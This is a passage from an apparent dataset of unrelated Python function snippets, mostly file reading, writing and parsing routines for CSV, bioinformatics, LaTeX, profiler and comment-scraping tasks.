test_case.direction))\n output = [\n helpers.get_license(),\n helpers.get_dont_modify_comment(scriptname=scriptname),\n INCLUDES,\n TYPED_TEST_SUITE_DECL_TPL.format(\n test_case=test_case_name,\n operation=OPERATOR_MAP[test_case.test_type],\n direction=DIRECTION_MAP[test_case.direction]),\n ]\n\n for test_params in test_params_for_test_case(test_case):\n output.extend(get_test_lines(test_case, test_params))\n output.append(\"\\n\")\n return output", "def outTxt(data, outPath, fileName):\n\n with open(outPath+fileName, \"wb\") as f:\n f.write(\"index,link,name,rating,review,price,category,neighborhood,address,phone,feedback\\n\")\n for record in data:\n f.write(\"%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s\\n\" % \\\n (record[0],record[1],record[2],record[3],record[4],record[5],record[6],\\\n record[7],record[8],record[9],record[10]))", "def main(input_filepath, output_filepath):\n logger = logging.getLogger(__name__)\n logger.info('making final data set from raw data')\n\n conn = sqlite3.connect('../raw/td_V2.db')\n git_commits = pd.read_sql_query(\"SELECT * FROM GIT_COMMITS\",conn)\n szz_fault_inducing_commits = pd.read_sql_query(\"SELECT * FROM szz_fault_inducing_commits\",conn)\n refactoring_miner = pd.read_sql_query(\"SELECT * FROM refactoring_miner\",conn)\n refactoring_miner = refactoring_miner[refactoring_miner[\"COMMIT_HASH\"].isin(git_commits[\"COMMIT_HASH\"])]\n git_commits_changes = pd.read_sql_query(\"SELECT * FROM GIT_COMMITS_CHANGES\", conn)\n git_commits_changes = git_commits_changes[git_commits_changes[\"COMMIT_HASH\"].isin(refactoring_miner[\"COMMIT_HASH\"])]\n\n preprocess(git_commits, szz_fault_inducing_commits, refactoring_miner, git_commits_changes)", "def main():\n filepath = input(\"Enter the Source File: \")\n with open(filepath, encoding=\"utf-8\") as f:\n sentences = f.readlines()\n sentences = \" \".join(sentences)\n\n summary = summarize_sentences(sentences)\n\n filepath_index = filepath.find(\".txt\")\n outputpath = filepath[:filepath_index] + \"_lexRank.txt\"\n\n with open(outputpath, \"w\") as w:\n for sentence in summary:\n w.write(str(sentence) + \"\\n\")", "def csv_to_txt():\n print('csv to text')\n input_files = sys.argv[1]\n i = 0\n for filename in os.listdir(input_files):\n print(i, filename[11:-4])\n output_txt_file = ''\n current_csv_df = pd.read_csv(sys.argv[1] + filename)\n for index, row in current_csv_df.iterrows():\n if (row['task_number'] == TASK_3[0] or row['task_number'] == TASK_3[1]) and type(\n row['spoken_word']) != float:\n output_txt_file += \" \" + row['spoken_word']\n txt_file = open('jan27_memory_texts/' + filename[11:-4] + '.txt', \"a\")\n txt_file.write(output_txt_file.lstrip(' '))\n txt_file.close()\n i+=1", "def write_CA_atoms():\n \n import os\n choice = input('Enter the name of the file: ')\n filepath = os.path.join('/home/njesh/python-mini-project-JaneNjeri/Data', choice)\n ca_list = []\n with open(filepath, 'r') as pdb:\n for line in pdb:\n if line[:4] == 'ATOM' and line[12:16] == \" CA \":\n line_split = line.split()[6:9]\n ca_list.append(line_split)\n choice1 = input('Enter name of the outfile: ')\n filepath1 = os.path.join('/home/njesh/python-mini-project-JaneNjeri/Results', choice1)\n with open(filepath1, 'w') as outfile:\n for i in ca_list:\n outfile.writelines(i)\n print('Done!')\n print(i)", "def process_file(filename, skip_header=True):\n hist = {}\n fp = file(filename)\n fullwordlist=[]\n # if skip_header:\n # skip_gutenberg_header(fp)\n\n for line in fp:\n holder=process_line(line,hist)\n #print holder\n 
fullwordlist.extend(holder)\n return fullwordlist", "def write_results(results):\n with RESULTS_PATH.open(\"w\") as writer:\n csvwriter = csv.writer(writer)\n csvwriter.writerows(results)", "def to_file(results: Solution, file: Path) -> Path:\n\n\tlogger = getLogger()\n\n\tfilepath = _create_filepath(file)\n\n\tlogger.info(f\"Writing the best results into '{filepath.name}'...\")\n\n\tnetwork_desc = Element(\"NetworkDescription\", {\"cost\": str(results.monetaryCost()), \"Redundancy_Ratio\":str(results.redundancySatisfiedRatio()), \"Deadlines_missed\":\"Yes\" if len(results.misses) > 0 else \"No\"})\n\tworst_wctt = list(results.streams)[0].WCTT\n\taverage_wctt = 0\n\tfor stream in results.streams:\n\t\tif stream.WCTT > worst_wctt:\n\t\t\tworst_wctt = stream.WCTT\n\t\taverage_wctt += stream.WCTT\n\taverage_wctt = average_wctt / len(results.streams)\n\n\tSubElement(network_desc, \"Worst_WCTT\", {\"Time\": str(worst_wctt), \"Unit\": \"Microseconds\"})\n\tSubElement(network_desc, \"Average_WCTT\", {\"Time\": str(average_wctt), \"Unit\": \"Microseconds\"})\n\n\tfor node in results.network:\n\t\tSubElement(network_desc, \"device\", {\"name\": node.name, \"type\": node.__class__.__name__})\n\n\tfor u, v, speed in results.network.edges(data=\"speed\"):\n\t\tSubElement(network_desc, \"link\", {\"src\": u.name, \"dest\": v.name, \"speed\": str(speed)})\n\n\tfor stream in results.streams:\n\t\tSubElement(network_desc, \"stream_times\", {\"id\": stream.id, \"WCTT\" : str(stream.WCTT)})\n\n\tfor time, streams in results.misses.items():\n\t\tmiss = SubElement(network_desc, \"miss\", {\"time\": str(time)})\n\n\t\tfor stream in streams:\n\t\t\tSubElement(miss, \"stream\", {\"id\": stream.id})\n\n\tnetwork_desc = _add_streams(network_desc, results)\n\n\troot = ElementTree(network_desc)\n\tindent(root, space=\"\\t\")\n\troot.write(filepath, encoding='utf-8', xml_declaration=True)\n\n\tlogger.info(\"done.\")\n\n\treturn filepath", "def display_algn_seq():\n \n import os\n choice = input('Enter the name of the file: ')\n filepath = os.path.join('/home/njesh/python-mini-project-JaneNjeri/Data', choice)\n with open(filepath,'r') as file:\n seq_list = []\n for line in file:\n if line[:6] == 'SEQRES':\n line_split = line.split()[4:]\n seq_list.append(line_split)\n \n filepath1 = os.path.join('/home/njesh/python-mini-project-JaneNjeri/Results', 'outfile1')\n with open(filepath1, 'w') as outfile:\n for i in seq_list:\n outfile.writelines(i)\n \n filepath2 = os.path.join('/home/njesh/python-mini-project-JaneNjeri/Results', 'outfile2')\n j = os.path.join('/home/njesh/python-mini-project-JaneNjeri/Results', 'outfile1')\n with open(j, 'r') as fil:\n d = {'CYS':'C','ASP':'D','SER':'S','GLN':'Q','LYS':'K','ILE':'I','PRO':'P','THR':'T','PHE':'F','ASN':'N',\n 'GLY':'G','HIS':'H','LEU':'L','ARG':'R','TRP':'W','TER':'*','ALA':'A','VAL':'V','GLU':'E','TYR':'Y',\n 'MET':'M','XAA':'X'}\n with open(filepath2, 'w') as outf:\n for line in fil:\n if len(line) %3 == 0:\n upper_seq = line.upper()\n single_seq = ''\n for i in range(int(len(upper_seq)/3)):\n single_seq += d[upper_seq[3*i:3*i+3]]\n outf.write(single_seq) \n return single_seq\n else:\n print(\"ERROR: Line was not a factor of 3 in length!\")", "def process_raw_phrases(file_path):", "def remove_tab_space(self):\n self.result_code = open(\"result.c\", \"r\") # Opening the intermediate file in 'read' mode.\n self.line_array = self.result_code.readlines() # Obtaining an array of strings, where each string is a line from the intermediate file.\n self.result_code.close() # 
Closing the intermediate file.\n\n self.result_code = open(\"result.c\", \"w\") # Opening the intermediate file in 'write' mode.\n # Looping over all the lines in the input file.\n for line in self.line_array:\n # Checking if the line begins with a white space.\n if line[0] == \" \":\n # Checking from which position the code begins over a loop, in order to remove the tab space.\n for c in range(1, len(line)):\n if line[c] != \" \":\n index = c # Making note of the position from which the code begins in the line.\n break\n self.result_code.write(line[index:]) # Writing the line without the tab space into the intermediate file.\n else:\n self.result_code.write(line) # Writing the entire line into the intermediate file in case there is no tab space at the beginning.\n\n self.result_code.close() # Closing the intermediate file.", "def expand_file(self, base_file, current_path, include_bbl, noline):\n output_lines = []\n f = self.open_encode_safe(base_file)\n for line in f:\n if self.is_input(line):\n new_base_file = self.combine_path(current_path, self.get_input(line))\n output_lines += self.expand_file(new_base_file, current_path, include_bbl, noline)\n if noline:\n pass\n else:\n output_lines.append('\\n') # add a new line after each file input\n elif include_bbl and line.startswith(\"\\\\bibliography\") and (not line.startswith(\"\\\\bibliographystyle\")):\n output_lines += self.bbl_file(base_file)\n else:\n output_lines.append(line)\n f.close()\n return output_lines", "def read_results(self):\n\n with open(os.path.join(self.directory, 'results.tag'), 'r') as fd:\n self.lines = fd.readlines()\n\n self.atoms = self.atoms_input\n self.results['energy'] = float(self.lines[1])*Hartree\n forces = self.read_forces()\n self.results['forces'] = forces\n\n # stress stuff begins\n sstring = 'stress'\n have_stress = False\n stress = list()\n for iline, line in enumerate(self.lines):\n if sstring in line:\n have_stress = True\n start = iline + 1\n end = start + 3\n for i in range(start, end):\n cell = [float(x) for x in self.lines[i].split()]\n stress.append(cell)\n if have_stress:\n stress = -np.array(stress) * Hartree / Bohr**3\n self.results['stress'] = stress.flat[[0, 4, 8, 5, 2, 1]]\n # stress stuff ends\n\n # calculation was carried out with atoms written in write_input\n os.remove(os.path.join(self.directory, 'results.tag'))", "def PrepareCompile(file):\n global oilcc_I,oilcc_o,oilcc_S,oilcc_target\n fp = open(file,'r')\n # some flags\n item = ''; #one item is minimum object such as TASK,ALARM ...\n barcenum = 0;\n flag = False; #has \" { \" encountered or not\n start = False #has match an obj start or not\n for line in fp.readlines():\n #firstly, filter out the comment on this line\n el = DropComment(line);\n if(start == False):\n #{\n item = ''; \n barcenum = 0;\n flag = False;\n if(IsIt('osekObj',el)):\n start = True;\n item += el;\n if(el.count('{') > 0): #so at comment should not include '{}'\n flag = True;\n barcenum += el.count('{');\n if(el.count('}') > 0):\n barcenum -= el.count('}');\n if((flag == True) and (barcenum == 0)): #in one line\n #filter out the multi-line comment\n item = DropComment(item)\n oilcc_texts.append(item);\n start = False\n else: # special process for include\n inc = GetIt('include',el)\n if(inc != None): #include file\n flag_inc = False\n for I in oilcc_I:\n finc = I + '/' + inc[0]\n if(os.path.exists(finc)):\n print 'INFO:parse include file <%s> in the path <%s>'%(inc[0],I)\n PrepareCompile(finc);\n flag_inc = True;\n if(flag_inc == False):\n print 
'ERROR:cann\\'t find out the file %s!'%(inc[0])\n sys.exit(-1)\n #}\n else:\n #{\n if(el.count('{') > 0): #so at comment should not include '{}'\n flag = True;\n barcenum += el.count('{');\n if(el.count('}') > 0):\n barcenum -= el.count('}');\n item += el;\n if((flag == True) and (barcenum == 0)):\n #filter out the multi-line comment\n item = DropComment(item)\n oilcc_texts.append(item);\n start = False\n #}\n fp.close()", "def make_source_text(input_one, input_two, input_three, output_text):\n # clear out the previous file contents\n open(output_text, 'w').close()\n # copy from three input files based on question answers\n copy_text(input_one, output_text)\n copy_text(input_two, output_text)\n copy_text(input_three, output_text)\n return output_text", "def writing_get_date_ordered(file_name):\n result = str(reports.get_date_ordered(file_name))\n with open (\"report_for_judy_part2.txt\", \"+a\") as f:\n f.write(result)\n f.write(\"\\n\")", "def post_process_output_file():\n parsed_data = []\n unparseable_data = []\n\n with open('../output/part-00000', 'r') as input_file:\n for line in input_file:\n line = line.strip()\n try:\n csv_splits = line.split(',')\n csv_splits[0] = int(csv_splits[0])\n # parsed_data is a list of lists\n parsed_data.append(csv_splits)\n except ValueError:\n unparseable_data.append(line)\n parsed_data.sort()\n\n with open('../output/titanic_test_data.csv', 'w') as output_file:\n # start with lines that couldn't be parsed\n # hopefully this will only be the original header\n for line in unparseable_data:\n output_file.write(\"%s\\n\" % line)\n for line in parsed_data:\n output_file.write(\"%d,%s\\n\" % (line[0], line[1]))", "def mergeLines(self,firstLineID,secondLineID):\n # 027 Get the lines\n sql=\"select word, total_count, netloc_count, path_count, params_count, query_count, fragment_count from BOW where bow_id=? or bow_id=?;\"\n args=(firstLineID,secondLineID,) \n self.DBcursor.execute(sql,args)\n result = self.DBcursor.fetchall()\n # 027 Combine the lines\n combined=[]\n # 027 Required check if both lines exist.\n if not len(result)==2 or not result[0] or not result[1]:\n self.logger.warning(\"One of input lines (%i,%i) does not exist in result: %s\"%(firstLineID,secondLineID,str(result)))\n else:\n #\n \n for item in itertools.izip(result[0],result[1]):\n # 027 Skips string and None - in both cases keeps original value.\n # 027 Column word is string. No sense to combine.\n if not isinstance(item[1],int):\n combined.append(item[0])\n # 027 If first is int and second null addition is not defined. Using the non-null one.\n elif not item[0]:\n combined.append(item[1])\n else:\n combined.append(item[0]+item[1])\n # 027 Writing changes into the db.\n sql=\"update BOW set total_count=?, netloc_count=?, path_count=?, params_count=?, query_count=?, fragment_count=? 
where bow_id=?;\"\n # 027 combined[0] is word - not updating.\n args=(combined[1],combined[2],combined[3],combined[4],combined[5],combined[6],firstLineID,)\n self.DBcursor.execute(sql,args)\n sql=\"delete from BOW where bow_id=?;\"\n args=(secondLineID,)\n self.DBcursor.execute(sql,args)\n return combined", "def make_head_line():\n with open(args.out_folder.strip() + \"/files/head_line.txt\", \"a\") as headLine:\n headLine.write(\"#Query ID\\t#Subject\\t#Subject accession\\t#Subject Taxonomy ID\\t#Identity percentage\\t#Coverage\\t#evalue\\t#bitscore\\n\")", "def loadText(self,inName):\n reComment = re.compile(r'\\s*\\#.*')\n ins = file(inName)\n for line in ins:\n #print line,\n #--Strip spaces and comments\n line = reComment.sub('',line)\n line = line.rstrip()\n #--Skip empty/comment lines\n if not line: continue\n #--Parse line\n (libId,srcId,altId) = line.split('\\t')[:3]\n self.libList.append(libId)\n self.libMap[libId] = (srcId,altId)\n #--Done\n ins.close()", "def write_SEQRES_fasta():\n \n import os\n choice = input('Enter the name of the file: ')\n filepath = os.path.join('/home/njesh/python-mini-project-JaneNjeri/Data', choice)\n with open(filepath,'r') as file:\n seq_list = []\n for line in file:\n if line[:6] == 'SEQRES':\n line_split = line.split()[4:]\n seq_list.append(line_split)\n choice1 = input('Enter name of the outfile: ') \n filepath1 = os.path.join('/home/njesh/python-mini-project-JaneNjeri/Results', choice1)\n with open(filepath1, 'w') as outfile:\n for i in seq_list:\n outfile.writelines(i)\n print('Sequences successfully written!')\n \n with open(choice, 'r') as myfile:\n header = ''\n for line in myfile:\n if line.startswith(\"TITLE\"): \n head_split = line.split()\n header = header + ' '.join(head_split[1:])\n \n choice2 = input('Enter output file name with a .fasta extension: ')\n filepath2 = os.path.join('/home/njesh/python-mini-project-JaneNjeri/Results', choice2)\n z = os.path.join('/home/njesh/python-mini-project-JaneNjeri/Results', choice1)\n with open(z, 'r') as file:\n with open(filepath2, 'w') as output:\n for i in file:\n output.writelines('>' + header + '\\n' + i)\n print('>' + header + '\\n' + i)\n print('Fasta file generated!')", "def _reportFileAnalytics(self, sourceFiles, outputFile, language):\n \n #is this a single file or a set of files?\n bSingleFile = len(sourceFiles) == 1\n \n #open the output file for appending\n f=self.openFile(outputFile, \"a\") #open for appending\n f.write ('<font face=\"verdana\" color=\"' + AutoGrader.Const.HEADER_COLOR1 + '\">')\n f.write ('<br>\\n=======================================================<br>\\n')\n if bSingleFile:\n f.write(sourceFiles[0]) #if this is a single file, simply output its name\n else: #if these are multiple files, list the directory name in bold\n f.write('<b>' + os.path.split(sourceFiles[0])[0] + '</b>') #directory name in bold\n f.write ('<br>\\n=======================================================<br>\\n</font>')\n\n #for each file, report the analytics\n for sourceFile in sourceFiles:\n if bSingleFile == False: #only print the filename if we have more than 1 file in the list\n f.write ('<font face=\"verdana\" color=\"' + AutoGrader.Const.HEADER_COLOR1 + '\">')\n f.write(os.path.split(sourceFile)[1] + '</font><br>\\n')\n \n if language == 'C++':\n numLines, numComments = self.analyzeCppCode(sourceFile)\n f.write ('<font face=\"courier\" color=\"' + AutoGrader.Const.ANALYTICS_COLOR1 + '\">Code Lines: ' + str(numLines))\n f.write ('<br>\\n~#Comments: ' + str(numComments) + '<br>\\n')\n \n 
if language == 'Python':\n numLines, numDocStr, numComments, numDefs, numClasses = self.analyzePythonCode(sourceFile)\n f.write ('<font face=\"courier\" color=\"' + AutoGrader.Const.ANALYTICS_COLOR1 + '\">Code Lines: ' + str(numLines))\n f.write (AutoGrader.Const.HTML_TAB_CHAR*2 + '~#Functions: ' + str(numDefs))\n f.write (AutoGrader.Const.HTML_TAB_CHAR*2 + '~#Classes: ' + str(numClasses))\n f.write ('<br>\\n~#Comments: ' + str(numComments))\n f.write (AutoGrader.Const.HTML_TAB_CHAR*2 + '~#DocStrs: ' + str(numDocStr) + '<br>\\n')\n \n f.write('</font><br>') #skip a line between entries\n f.close()", "def concatenate_processed_text(self):\n\n\n\t\tconcatenated_text = \"\"\n\t\tfor line in self.processed_text:\n\t\t\tconcatenated_text += \" \".join(line) + \" \"\n\n\n\t\t# Remove the trailing space character from the concatenated string\n\t\t# of words.\n\t\tconcatenated_text = concatenated_text[:-1]\n\n\t\tself.concatenated_text = concatenated_text", "def outputFunc(filename, resultList):\n #assert len(parks) == 3\n \n f = open(filename, 'wt')\n \n try:\n writer = csv.writer(f)\n for i in range(len(resultList)):\n print resultList[0]\n writer.writerow(resultList[i])\n \n finally:\n f.close()", "def write_output(self):\n with open(self.filename, 'a', newline='', encoding='utf-8') as \\\n csv_file:\n csv_writer = csv.writer(csv_file)\n if os.stat(self.filename).st_size == 0:\n # if the csv file needs a headers\n csv_writer.writerow(Configurations.header)\n for quote in self.quotes_objects:\n csv_writer.writerow(quote.info)", "def reformat_file(inFile, outFile):\n \n with open(outFile, \"w\") as outHandle:\n \n\t\t# write header line\n\t\toutLine = [\"g1\", \"g2\", \"raw_count\", \"log(obs/exp)\"]\n\t\t\n\t\toutHandle.write(\"\\t\".join(outLine) + \"\\n\")\n\n\n\t\tfor i, line in enumerate(open(inFile)):\n\t\t\t\n\t\t\tif not i == 0:\n\t\t\t\t\n\t\t\t\tsp = line.strip().split(\"\\t\")\n\t\t\t\t\n\t\t\t\t# get row interaction counts and normalized obs/exp values\n\t\t\t\trawCount = sp[12]\n\t\t\t\tobsExp = sp[13]\n\t\t\t\t\n\t\t\t\tgenes1 = sp[4].split(\"|\")\n\t\t\t\tgenes2 = sp[10].split(\"|\")\n\t\t\t\t\n\t\t\t\t#~ print(g1, g2, rawCount)\n\t\t\t\t\n\t\t\t\t# iterate over all pairs\n\t\t\t\tfor g1 in genes1:\n\n\t\t\t\t\tfor g2 in genes2:\n\t\t\t\t\t\t\n\t\t\t\t\t\toutLine = [g1, g2, rawCount, obsExp]\n\t\t\t\t\t\t\n\t\t\t\t\t\toutHandle.write(\"\\t\".join(outLine) + \"\\n\")", "def convert(sInFile, sOutFile = None, bReport = True):\r\n\r\n\t# Globals\r\n\tglobal pOutFile\r\n\r\n\t# File jiggery.\r\n\tif not sOutFile:\r\n\t\tsOutFile = sInFile.replace(\".\", \"_dtemp.\")\r\n\r\n\t# Some initial state and a line counter.\r\n\tendComment()\r\n\tbInComment = False\r\n\tiLine = 0\r\n\tiComments = 0\r\n\tiStartTime = time.clock()\r\n\r\n\t# Open the files.\r\n\tpOutFile = open(sOutFile, \"w\")\r\n\twith open(sInFile) as pIn:\r\n\t\t\t\t\t\t\t\t \r\n\t\t# For each line in the file.\r\n\t\tfor sLine in pIn:\r\n\r\n\t\t\t# Increment counter.\r\n\t\t\tiLine += 1\r\n\t\t\t\t\t\t\t\t \r\n\t\t\t# If we are in a comment, handle the line.\r\n\t\t\tif bInComment:\r\n\t\t\t\tbInComment = handleCommentLine(sLine, iLine)\r\n\r\n\t\t\t# Check the new line to see if it opens a comment line.\r\n\t\t\telif OPEN_COMMENT in sLine:\r\n\t\t\t\tiComments += 1\r\n\t\t\t\tbInComment = handleCommentLine(sLine, iLine)\r\n\r\n\t\t\t# We are neither a comment so write the line back to the source.\r\n\t\t\telse:\r\n\t\t\t\tpOutFile.write(sLine)\r\n\r\n\t# Close the output file.\r\n\tpOutFile.close()\r\n\t\r\n\t# Backup the 
old file.\r\n\t#shutil.copy(sInFile, sInFile + \"_dbackup\")\r\n\t\r\n\t# Copy the new file over the old file.\r\n\tshutil.copy(sOutFile, sInFile)\r\n\t\r\n\tos.remove(sOutFile)\r\n\t\r\n\t# Report.\r\n\tif bReport:\r\n\t\tprint sInFile\r\n\t\tprint str(iComments) + \" comment blocks converted within \"+str(iLine)+\" lines in approx \"+str(round(time.clock() - iStartTime, 2))+\" seconds.\"", "def generate(self, fileName):\n self.preProcess()\n styleFile = open(fileName, 'w')\n # write head part\n head = \"\"\"#!/usr/bin/env python\n\nimport os\n\nfrom WMQuality.Code import Code\n\n# output of the log files\n# prefix of the files in cvs\n# quality script for using pylint:\nqualityScript = '%s'\n# output file:\nqualityReport = '%s'\n# rating threshold (min: 0, max 10)\nthreshold = %s\n\npackages = {\\\\\n \"\"\" % (self.script, self.report, self.threshold)\n styleFile.writelines(head)\n styleFile.writelines('\\n')\n\n for moduleName in self.module.keys():\n # find the one with the most votes per module:\n # register this.\n styleFile.writelines(\" '\" + moduleName + \"':'\" + self.module[moduleName] + \"',\\\\\\n\")\n styleFile.writelines('}\\n')\n tail = \"\"\"\ncode = Code(qualityScript, qualityReport, WMCore.WMInit.getWMBASE(), threshold, packages)\ncode.run()\ncode.summaryText()\n \"\"\"\n styleFile.writelines(tail)\n styleFile.close()", "def minify(infile, outfile, max_width):\n\n source = infile.read()\n statement_list = scan_for_statements(source)\n line_list = build_output_line_list(statement_list, max_width)\n outfile.write(ATASCII_LINEFEED.join(line_list))", "def ReadIndex_text(indexfile, isPrintWarning = False):#{{{\n# return (indexList, headerinfo, dbfileindexList)\n indexList = []\n idList = []\n v1 = array('B') # dbfile index\n v2 = array('L') # offset\n v3 = array('I') # block size\n apd1 = idList.append\n apd2 = v1.append\n apd3 = v2.append\n apd4 = v3.append\n indexFileHeaderText = []\n origdbname=\"\"\n origversion=\"\"\n origext=\"\"\n origprefix=\"\"\n try:\n\n hdl = mybase.ReadLineByBlock(indexfile)\n lines = hdl.readlines()\n while lines != None:\n for line in lines:\n if not line or line[0] == \"#\":\n continue\n strs = line.split()\n if strs[0] == \"DEF_DBNAME\":\n if len(strs)>=2:\n origdbname=strs[1]\n elif strs[0] == \"DEF_VERSION\":\n if len(strs)>=2:\n origversion=strs[1]\n elif strs[0] == \"DEF_EXTENSION\":\n if len(strs)>=2:\n origext=strs[1]\n elif strs[0] == \"DEF_PREFIX\":\n if len(strs)>=2:\n origprefix = strs[1]\n else:\n apd1(strs[0])\n apd2(int(strs[1]))\n apd3(int(strs[2]))\n apd4(int(strs[3]))\n lines = hdl.readlines()\n\n indexList.append(idList)\n indexList.append(v1)\n indexList.append(v2)\n indexList.append(v3)\n\n headerinfo = (origdbname, origversion, origext, origprefix)\n\n numRecord = len(idList)\n lastDBFileIndex = v1[numRecord-1]\n dbfileindexList = list(range(lastDBFileIndex+1))\n\n if isPrintWarning:\n if origversion == \"\":\n msg = \"{}: Warning! No version info in the index file {}\"\n print(msg.format(sys.argv[0],indexfile), file=sys.stderr)\n elif origversion != version:\n msg = \"{}: Warning! Version conflicts. 
\"\\\n \"Version of the index file {} ({}) \"\\\n \"!= version of the program ({})\"\n print(msg.format(sys.argv[0],indexfile,\n origversion, version), file=sys.stderr)\n return (indexList, headerinfo, dbfileindexList)\n except IOError:\n msg = \"Failed to read index file {} in function {}\"\n print(msg.format(indexfile, sys._getframe().f_code.co_name), file=sys.stderr)\n return (None, None, None)", "def condolidateReads(options):\n input_filename=options.adapter_trimmed_filename\n output_filename=options.consolidated_filename\n fhw=open(output_filename,\"w\")\n #original_data=readFastqFile(input_filename)\n fhr=open(input_filename,\"r\")\n data={}\n while True:\n line=fhr.readline().strip()\n if not line:\n break\n id=line\n seq=fhr.readline().strip()\n useless=fhr.readline()\n quality=fhr.readline()\n if seq not in data:\n data[seq]=1\n else:\n data[seq]+=1\n for seq_num,seq in enumerate(data):\n fhw.write(\">read_\"+str(seq_num+1)+\"_\"+str(data[seq])+\"\\n\"+seq+\"\\n\")\n fhw.close()", "def writing_get_game(file_name, title):\n result = str(reports.get_game(file_name, title))\n with open (\"report_for_judy_part2.txt\", \"+a\") as f:\n f.write(result)\n f.write(\"\\n\")", "def openie_process_output(openie_out: str, outfile: str):\n tuples = 0\n with open(openie_out, 'r') as f_out, open(outfile, 'w') as f_conv:\n writer = csv.writer(f_conv, delimiter='\\t')\n writer.writerow(['document id',\n 'subject',\n 'predicate',\n 'predicate lemmatized',\n 'object',\n 'confidence',\n 'sentence'])\n for idx, line in enumerate(f_out):\n tuples += 1\n components = line.strip().split(\"\\t\")\n # e.g. first line looks like /tmp/tmpwi57otrk/input/1065332.txt (so pmid is between last / and .)\n doc_id = components[0].split(\"/\")[-1].split('.')[0]\n subj = components[2].lower()\n pred = components[3].lower()\n obj = components[4].lower()\n conf = components[11].replace(',', '.')\n sent = components[-5]\n pred_lemma = components[-2]\n\n res = [doc_id, subj, pred, pred_lemma, obj, conf, sent]\n writer.writerow([str(t) for t in res])\n\n logging.info('{} lines written'.format(tuples))", "def report(self, fileName = None):\n\n header = ARCPY.GetIDMessage(84200)\n columns = [ARCPY.GetIDMessage(84191), ARCPY.GetIDMessage(84201), \n ARCPY.GetIDMessage(84202)]\n results = [ columns ]\n for case in self.uniqueCases:\n if not self.caseField:\n strCase = \"ALL\"\n else:\n strCase = UTILS.caseValue2Print(case, self.caseIsString)\n cfOIDs, minSumDist = self.cf[case]\n cfOIDs = [ str(i) for i in cfOIDs ]\n cfOIDs = \", \".join(cfOIDs)\n rowResult = [ strCase, \n cfOIDs,\n LOCALE.format(\"%0.6f\", minSumDist) ]\n results.append(rowResult)\n\n outputTable = UTILS.outputTextTable(results, header = header)\n if fileName:\n f = UTILS.openFile(fileName, \"w\")\n f.write(outputTable)\n f.close()\n else:\n ARCPY.AddMessage(outputTable)", "def _write_to_file(self):\n with open(self.filename + \".ir\", \"w+\") as file:\n file.writelines(\n [\"\\n\" + l if p != 0 else l for p, l in enumerate(self.lines)]\n )", "def scrapeFacebookComments(file_id, result_file, access_token):\n with open(file_id, 'r', encoding='utf8') as f, \\\n open(result_file, 'w', encoding='utf8', newline='') as o:\n input_file = csv.DictReader(f)\n output_file = csv.DictWriter(o, \n fieldnames=[\n 'sentence_id', \n 'sentence_text'])\n\n output_file.writeheader()\n\n num_processed = 0\n scrape_starttime = datetime.datetime.now()\n base = \"https://graph.facebook.com/v2.12\"\n parameters = \"/?access_token={}\".format(access_token)\n\n print(\"Scraping {} 
Comments: {}\\n\".format(\n file_id, scrape_starttime))\n\n comment_contents = {}\n\n for row in input_file:\n if row['comment_id'] in comment_contents:\n comment = comment_contents[row['comment_id']]\n else:\n node = \"/{}\".format(row['comment_id'])\n url = base + node + parameters\n reply = request_until_succeed(url)\n \n if not reply:\n print(\"Comment doesn't exists anymore: \" + row['comment_id'])\n continue\n \n try:\n comment = json.loads(reply)\n except:\n comment = json.loads(reply.decode('utf-8')) #python 3.5 and earlier bugfix\n comment_contents[row['comment_id']] = comment # cache result in case of reuse\n\n comment_message = '' if 'message' not in comment \\\n or comment['message'] is '' else \\\n unicode_decode(comment['message'])\n\n sentence_texts = sent_tokenize(comment_message,\n language='german')\n sentence_text = sentence_texts[int(row['sentence_number'])]\n\n ha = hashlib.md5(sentence_text.encode()).hexdigest()\n\n if ha != row['md5_hash']:\n print(\"Wrong MD5 hash for comment: \" + row['comment_id'] + \", \" + sentence_text)\n continue\n\n output_file.writerow({'sentence_id': row['sentence_id'],\n 'sentence_text': sentence_text})\n\n num_processed += 1\n if num_processed % 100 == 0:\n print(\"{} Comments Processed: {}\".format(\n num_processed, datetime.datetime.now()))\n\n print(\"\\nDone!\\n{} Comments Processed in {}\".format(\n num_processed, datetime.datetime.now() - scrape_starttime))", "def postprocess_cga(lines, outfile):\n pattern = re.compile(\"^\\s*([0-9,]+)\\s+\\([ 0-9.]+%\\)\\s+Source/(\\S+):(\\S+)\\(.*\\).*$\")\n\n totalCost = 0.0\n functionTable = []\n functionMap = {}\n\n for line in lines:\n line = line.strip()\n match = pattern.match(line)\n if not match:\n continue\n\n cost = float(match.group(1).replace(\",\", \"\"))\n sourceFile = match.group(2)\n function = match.group(3)\n\n # Filter out library code we don't want to change\n if function.startswith(\"stbi__\"):\n continue\n\n totalCost += cost\n\n # Accumulate the scores from functions in multiple call chains\n if function in functionMap:\n index = functionMap[function]\n functionTable[index][1] += cost\n functionTable[index][2] += cost\n # Else add new functions to the end of the table\n else:\n functionMap[function] = len(functionTable)\n functionTable.append([function, cost, cost])\n\n # Sort the table by accumulated cost\n functionTable.sort(key=lambda x: 101.0 - x[2])\n\n for function in functionTable:\n function[2] /= totalCost\n function[2] *= 100.0\n\n with open(outfile, \"w\") as fileHandle:\n\n totals = 0.0\n for function in functionTable:\n # Omit entries less than 1% load\n if function[2] < 1:\n break\n\n totals += function[2]\n fileHandle.write(\"%5.2f%% %s\\n\" % (function[2], function[0]))\n\n fileHandle.write(\"======\\n\")\n fileHandle.write(f\"{totals:5.2f}%\\n\")", "def gen_solve_to_text(self):\n\n count = 0\n self.url = \"scramble: \\n\"\n for move in self.scramble.split():\n self.url += \"{} \".format(move)\n self.url += \"\\n\\nsolve:\\n\"\n\n for move in self.solve_stats:\n if self.comms_unparsed_bool:\n if move[\"comment\"] != \"\":\n if \"mistake\" in move[\"comment\"]:\n move[\"comment\"] = \"{}\\n//{}\".format(move[\"comment\"].split(\"mistake\")[0], \"mistake from here\")\n if \"#\" in move[\"comment\"]:\n piece = move[\"comment\"].split(\"#\")[0]\n move[\"comment\"] = move[\"comment\"].split(\"#\")[1]\n if self.url.rfind(\"\\n\") != -1:\n alg = self.url[self.url.rfind(\"\\n\") + 1:]\n self.url = self.url[:self.url.rfind(\"\\n\") + 1] + \"\\n//{}\\n\".format(piece) 
